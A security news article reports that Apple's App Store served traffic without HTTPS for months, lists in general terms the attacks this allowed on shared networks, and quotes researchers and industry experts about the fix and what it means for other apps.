Apple's App Store lacked encryption protection for months

Apple's app store operated for months without the protection of SSL encryption, according to researchers.

Apple announced it had fixed the problem in January, but the researchers who discovered the flaw didn't write about it until this month.

"I am really happy that my spare-time work pushed Apple to finally enable HTTPS to protect users," Elie Bursztein, whose full-time job is with Google, wrote in a personal blog.

Apple did not respond to a request for comment.

[See also: Mobile apps are new cyber crime attack vector ]

Bursztein, along with Bernhard "Bruhns" Brehm of Recurity Labs and Rahul Iyer of Bejoi found out in July 2012 that communications between Apple's App Store and consumers using the store were unencrypted. That deficiency opened up users to several kinds of attack on public networks, like those found in an airport or coffee shop, according to Bursztein.

The potential attacks included:

  • Password Stealing. When a user logged into the App Store, an attacker could slip a phony password request screen into the process, effectively prompting the user to hand over their password. "That Apple ID controls your credit card for buying music and apps; it controls all your backups with all your contacts," Chet Wisniewski, a security advisor with cyber security software maker Sophos, said in an interview. "That's pretty sensitive stuff,. The Apple ID is similar to Facebook and Google. Once it's hacked, it cracks open the walnut of your entire digital life."

  • App Swapping. A user could be duped into installing an attacker's app when they think they're installing legitimate software. An app that costs money can be substituted for a free app, too.

  • Fake Upgrades. Cyber thieves could trick a user into installing something other than the app upgrade they think they're getting.

  • Installation Prevention. This would prevent an app from being installed on a machine by removing it from the store or by tricking the device into thinking the app has already been installed.

  • App spying. The App Store's update mechanism could be tapped and all the applications installed on a user's device could be viewed by a cyber peeper.

With App Store communications vulnerable for so long, it's a wonder that a significant attack didn't take place, said HD Moore, CSO of Rapid7 in Boston.

"I've seen the hacker community talking about this and demonstrate different techniques," he said, "but it is surprising that there hasn't been any more wide scale attacks."

A limiting factor, he explained, is that you have to be in the same physical area as your target -- either the same local segment or the same wireless network to carry it out.

The security breakdown could encourage mobile app makers to take another look at their wares, Moore added. "On mobile devices, a lot of folks can't tell if SSL is on in the background. With desktops and laptops, users have been well-trained to look for that SSL lock icon in the corner."

The incident could also grab the attention of security shops at online retailers, said Jamz Yaneza, threat research manager at Trend Micro in Cupertino, Calif.

"I think it's a wake-up call for online retailers who outsource development of apps," he said. "When they do that, they should make sure those apps use all the encryption that's required.

"With all the breaches we're been hearing about in the past few weeks, now is the time for them to take a close look on how they're securing customer data."

Read more about application security in CSOonline's Application Security section.

Join the CSO newsletter!

Error: Please check your email address.

Tags applicationsAccess control and authenticationsoftwareencryptionRecurity Labsdata protectionElie BurszteinApple App StoreApplesecurityData Protection | Application SecurityRapid7

More about AppleCSOFacebookGoogleRapid7SophosTrend Micro Australia

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by John P. Mello Jr.

Latest Videos

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

  • 150x50

    IDG Live Webinar:The right collaboration strategy will help your business take flight

    Speakers - Mike Harris, Engineering Services Manager, Jetstar - Christopher Johnson, IT Director APAC, 20th Century Fox - Brent Maxwell, Director of Information Systems, THE ICONIC - IDG MC/Moderator Anthony Caruana

    Play Video

More videos

Blog Posts